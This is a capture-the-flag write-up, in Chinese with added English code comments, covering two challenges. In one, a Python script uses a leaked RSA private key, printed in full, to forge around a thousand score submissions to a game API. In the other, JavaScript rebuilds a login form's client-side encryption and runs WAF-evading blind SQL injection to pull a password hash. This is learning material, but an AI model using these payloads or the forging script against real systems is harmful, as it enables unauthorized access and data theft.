gameapp
这题首先反编译 apk, 简单看了看代码, 主要是有 startgame 和 score 两个 API, 然后用模拟器 (手机登不上) 安装 apk 抓了下包, 数据经过了 rsa 加密, 所以首先用 python 实现 rsa(在网上搜索私钥可以发现已经使用过, 所以直接将别人的脚本改了改来用). 题目要求获取 99999, 但一次最多获取 100 分, 所以发送 999 次 100 分, 再发送一次 99 分即可.
- import cPickle,M2Crypto,os,urllib,requests
# Challenge endpoint taken from the write-up (CTF infrastructure).
BaseUrl="http://121.40.219.183:9999/"
# RSA private key used by private_encrypt() to "sign" every API request.
# It is hard-coded here and, per the write-up, was already findable online
# (reused key), so the server's trust in these requests rests on a secret that
# is not secret: it cannot tell the genuine app from any script holding this PEM.
sign_pri='''
-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMYImonQdMC1Y8USwIwf7Y0GcBP
/h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8aYFoms223okyzeTlUIRHbIkto
1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHEA3Hau/DTzW4g4xhvzQIDAQAB
AoGAVHWs7rAnT28ZHtPUCNzqulXrlnBIhx3JMejJfqfR8H7vff2TqcA4FEEr2QNx
U0Pj0tzqS9KrO1EpQ7FwXtheoAmf3tQb5BDxPxcph2820qa/AcIxHpf5LqfONs9d
UrozcR23s561yjX7w5akeRzOwrq2BKwVtF/EoXvJTQKlwV0CQQDY96T70hxUOLoJ
FrLelwl/4Heb0Lrz83lMB6UXknUbJgOiZr/KD9NzEM477MqzKD2rTM4TeULX6cNd
hXm35daXAkEAyWtkRrStowoiscynG1KfaT4ksbbHWr53iqAhv7Z3SAshn3k9TURk
kLCQhyIcXXnuEEGFlK84WxQSy2Q6uLI9OwJBAMpLdE+7IuDAF2z79gCmUJwjfUIR
hw6H95OVGS/2RSvv8LmOFcpfoSaLB89Fw+TxYzaBoS71BAbulVJwbgGx0bcCQQCs
rJxy4UJam73Sn5hDHDn9h4D9uax+ZvskpNNJ/6uS37gbd1zOeOud/0BoGR4oJPeq
iAF0ziKKMlNKesq8vFExAkEAsvLbn5avP/CEkXZB4sRDV/gD3mK+IY5p+ZlBSYAe
KhVKdUXkdJwNqBn+iJMwFhMC7xHIbijLRe3hL9ZB0vt1nQ==
-----END RSA PRIVATE KEY-----
'''
def private_encrypt(data):
    """Apply the RSA private-key operation to *data* and return it as base64.

    Loads the module-level ``sign_pri`` PEM and runs M2Crypto's
    ``private_encrypt`` with PKCS#1 v1.5 padding. Note that "encrypting"
    with a private key is the raw signature primitive: it proves possession
    of the key, it does not hide the payload from anyone holding the public
    key. The result is encoded with the Python 2 ``'base64'`` codec (line
    wrapped, trailing newline).

    Args:
        data: plaintext bytes/str to transform (must fit one RSA block).

    Returns:
        Base64 text of the padded RSA output.
    """
    key = M2Crypto.RSA.load_key_string(sign_pri)
    padding = M2Crypto.RSA.pkcs1_padding
    # Single RSA block in, base64 text out.
    return key.private_encrypt(data, padding).encode('base64')
def public_decrypt(msg):
    """Undo ``private_encrypt`` with the matching public key.

    Base64-decodes *msg*, loads the embedded PEM public key (the public half
    of ``sign_pri``) and runs M2Crypto's ``public_decrypt`` with PKCS#1 v1.5
    padding, returning the recovered plaintext bytes.

    Args:
        msg: base64 text as produced by ``private_encrypt``.

    Returns:
        The original plaintext bytes.
    """
    pem = '''
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMY
ImonQdMC1Y8USwIwf7Y0GcBP/h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8a
YFoms223okyzeTlUIRHbIkto1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHE
A3Hau/DTzW4g4xhvzQIDAQAB
-----END PUBLIC KEY-----
'''
    pub_key = M2Crypto.RSA.load_pub_key_bio(M2Crypto.BIO.MemoryBuffer(pem))
    raw = msg.decode("base64")
    return pub_key.public_decrypt(raw, M2Crypto.RSA.pkcs1_padding)
# Driver: open a game session, then push score updates until 99999 is reached.
# The API caps a single update at 100 points, but nothing caps the number of
# updates per session, so 999 x 100 followed by 1 x 99 gets there; a server-side
# mitigation would bound the total per session or rate-limit the score endpoint.
data1 = '{"player":"user"}'
a = requests.Session()
_hdrs = {'Content-Type': 'xxx'}
# startgame establishes the session the later score posts rely on.
a.post(url=BaseUrl + "startgame/", data=private_encrypt(data1), headers=_hdrs)
for points in [100] * 999 + [99]:
    r = a.post(url=BaseUrl + "score/",
               data=private_encrypt('{"score":%d,"op":"add"}' % points),
               headers=_hdrs)
    print r.text
r = a.get(url=BaseUrl, headers=_hdrs)
print r
print a
- Inject4Fun
这题需要说的其实不多, 总结就两点
1. 实现前端加密
// Reproduction of the login page's client-side crypto so a request can be built
// outside the form. The client picks the 16-byte AES key `a` and the IV,
// encrypts username and password with AES-CBC (zero padding), and sends the key
// RSA-encrypted under the server's public key as the `code` field.
// Everything here runs on the client side, so it gives the server no guarantee
// about the decrypted values: validation and parameterised queries still have to
// happen server-side, after decryption.
var password = "admin";
var username = "admin";
var a = '1234567890abcdef';                               // AES key chosen by the client
var key = CryptoJS.enc.Latin1.parse(a);
var iv = CryptoJS.enc.Latin1.parse('1234567890123456');   // fixed, public IV
var data1 = username;
// CipherParams objects; the "+" concatenation in xhr.send() below stringifies them.
var encrypted1 = CryptoJS.AES.encrypt(data1, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
var data2 = password;
var encrypted2 = CryptoJS.AES.encrypt(data2, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
var rsa = new RSAKey();
// Server's RSA public key (hex modulus, public exponent 0x10001).
var modulus = "CDB41B014C244A55CEC3E9D222B22C8A05A7DD7DF8A419A2A9C08E91DF725A1FD4C09777F36D394701C5DB97CCFC52FFBD5A90329295F5CEBBB89986BAAFAE4FE58A1F3ECFC39A7B960F5697632CE9D2FAA787F36D9CF5F4FE59DBB52E0554CC4B510D87AB72EB80D36A61E8B9AD00F37720578986E5F17AB0387754566F4E2B";
var exponent = "010001";
rsa.setPublic(modulus, exponent);
var res = rsa.encrypt(a);                                 // AES key wrapped with RSA -> `code`
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://129.204.73.141:2000/login.php", false);   // third argument false: synchronous request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send("username=" + encrypted1 + "&password=" + encrypted2 + "&code=" + res);
xhr.response   // bare expression: presumably evaluated in a devtools console to show the reply
2. 绕过 waf
这里直接给出 payload
// Boolean-oracle probes: the login handler answers "wrong password" or
// "wrong user" depending on whether the injected comparison holds, so each
// request leaks one bit about the stored value. Server-side, parameterised
// queries plus a single generic login-failure message remove this oracle.
var username = "admin'=(left(right(password,1),1)>'a')='1"; // response: wrong password
var username = "admin'=(left(right(password,1),1)<'a')='1"; // response: wrong user
- exp
不知道为什么, 这题的 waf 有毒, 可能随机性触发, 可以通过修改随机生成的 16 位 key 来解决这个问题
因为 waf 有毒的问题, 没法一次性跑出 32 位 hash, 需要多次修改 a 来获取完整 hash
// Recovers a 32-character hex value (the write-up calls it a hash) from the
// `password` column one character per position, using the wrong-password /
// wrong-user oracle. right(password,n) then left(...,1) selects the n-th
// character from the END, so `pass` is built last-character-first, i.e. it is
// the stored value reversed.
// From a defender's view this is up to 32 x 16 = 512 synchronous login POSTs
// with SQL in the username, sent in a burst from one client: a pattern that
// logging and rate limiting on login.php would surface immediately.
var pass = '';
var s = '1234567890abcdef';              // hex alphabet: 16 candidates per position
for (var n = 1; n < 33; n++) {
    for (var i in s) {                   // i is the index (as a string), s[i] the candidate char
        var password = "admin";
        var username = "admin'=(left(right(password," + n + "),1)='" + s[i] + "')='1";
        // Differs from the earlier key ('...abcdef'): the text above says the key
        // is varied to get around the WAF's erratic triggering.
        var a = '1234567890abceef';
        var key = CryptoJS.enc.Latin1.parse(a);
        var iv = CryptoJS.enc.Latin1.parse('1234567890123456');
        var data1 = username;
        var encrypted1 = CryptoJS.AES.encrypt(data1, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
        var data2 = password;
        var encrypted2 = CryptoJS.AES.encrypt(data2, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding });
        var rsa = new RSAKey();
        var modulus = "CDB41B014C244A55CEC3E9D222B22C8A05A7DD7DF8A419A2A9C08E91DF725A1FD4C09777F36D394701C5DB97CCFC52FFBD5A90329295F5CEBBB89986BAAFAE4FE58A1F3ECFC39A7B960F5697632CE9D2FAA787F36D9CF5F4FE59DBB52E0554CC4B510D87AB72EB80D36A61E8B9AD00F37720578986E5F17AB0387754566F4E2B";
        var exponent = "010001";
        rsa.setPublic(modulus, exponent);
        var res = rsa.encrypt(a);
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://129.204.73.141:2000/login.php", false);   // synchronous
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        // NOTE: setTimeout is handed the *return value* of xhr.send(), which has
        // already executed synchronously by then; no 1 s pause actually occurs.
        setTimeout(xhr.send("username=" + encrypted1 + "&password=" + encrypted2 + "&code=" + res), 1000);
        // "wrong password" is the response for a true comparison (see the probes above).
        if (xhr.response.search('wrong password') != -1) {
            pass += s[i];
            console.log(s[i] + ' ' + n);
            break;                       // position n resolved; move to the next one
        }
    }
}
来源: http://www.bubuko.com/infodetail-3222370.html